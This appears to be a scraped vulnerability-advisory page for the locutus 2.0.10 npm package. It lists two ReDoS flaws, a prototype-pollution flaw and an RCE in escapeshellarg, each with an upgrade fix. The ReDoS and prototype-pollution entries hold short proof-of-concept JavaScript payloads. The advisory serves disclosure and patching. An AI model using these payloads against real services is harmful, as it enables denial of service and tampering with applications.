locutus 2.0.10 vulnerabilities

Known vulnerabilities in the locutus package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the `gopher_parsedir` function. PoC by Yeting Li `var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir") function build_attack(n) { var ret = "" for (var i = 0; i < n; i++) { ret += "\t" } return ret + "!"; } var attack_str = build_attack(5000) // var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a') var entry = gopher_parsedir(attack_str)` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `locutus` to version 2.0.15 or higher.	<2.0.15
M Regular Expression Denial of Service (ReDoS) locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at `src/php/network/inet_pton.js:24` is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating characters followed by 'a .' string. PoC by Robert McLaughlin `const inet_pton = require('locutus/php/network/inet_pton'); console.log('starting') for (let i=4; i < 40; i++) { const str = new Array(i).fill('a').join('') + '.'; const start = + new Date(); inet_pton(str); const elapsed = (+ new Date()) - start; console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000); }` How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `locutus` to version 2.0.15 or higher.	<2.0.15
C Prototype Pollution locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Prototype Pollution via the `php.strings.parse_str` function. POC: `const locutus = require('locutus'); locutus.php.strings.parse_str('__proto__[polluted]=true"", {}); console.log(polluted);` How to fix Prototype Pollution? Upgrade `locutus` to version 2.0.12 or higher.	<2.0.12
H Remote Code Execution (RCE) locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes Affected versions of this package are vulnerable to Remote Code Execution (RCE). The `php/exec/escapeshellarg` function allows an attacker to achieve code execution. How to fix Remote Code Execution (RCE)? Upgrade `locutus` to version 2.0.13 or higher.	<2.0.13

Vulnerability

Vulnerable Version

Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the gopher_parsedir function.

PoC by Yeting Li

var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir")
function build_attack(n) {
 var ret = ""
 for (var i = 0; i < n; i++) {
  ret += "\t"
 }
 return ret + "!";
}


var attack_str = build_attack(5000)
// var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a')
var entry = gopher_parsedir(attack_str)

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15

Regular Expression Denial of Service (ReDoS)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at src/php/network/inet_pton.js:24 is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating characters followed by 'a .' string.

PoC by Robert McLaughlin

const inet_pton = require('locutus/php/network/inet_pton');
console.log('starting')
for (let i=4; i < 40; i++)
{
    const str = new Array(i).fill('a').join('') + '.';
    const start = + new Date();

    inet_pton(str);

    const elapsed = (+ new Date()) - start;
   
    console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000);
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade locutus to version 2.0.15 or higher.

<2.0.15

Prototype Pollution

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Prototype Pollution via the php.strings.parse_str function.

POC:

const locutus = require('locutus');
locutus.php.strings.parse_str('__proto__[polluted]=true"", {});
console.log(polluted);

How to fix Prototype Pollution?

Upgrade locutus to version 2.0.12 or higher.

<2.0.12

Remote Code Execution (RCE)

locutus is a Locutus other languages' stadard libraries to JavaScript for fun and educational purposes

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The php/exec/escapeshellarg function allows an attacker to achieve code execution.

How to fix Remote Code Execution (RCE)?

Upgrade locutus to version 2.0.13 or higher.

<2.0.13

locutus@2.0.10 vulnerabilities

Locutus other languages' standard libraries to JavaScript for fun and educational purposes

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?

PoC by Yeting Li

PoC by Robert McLaughlin

POC: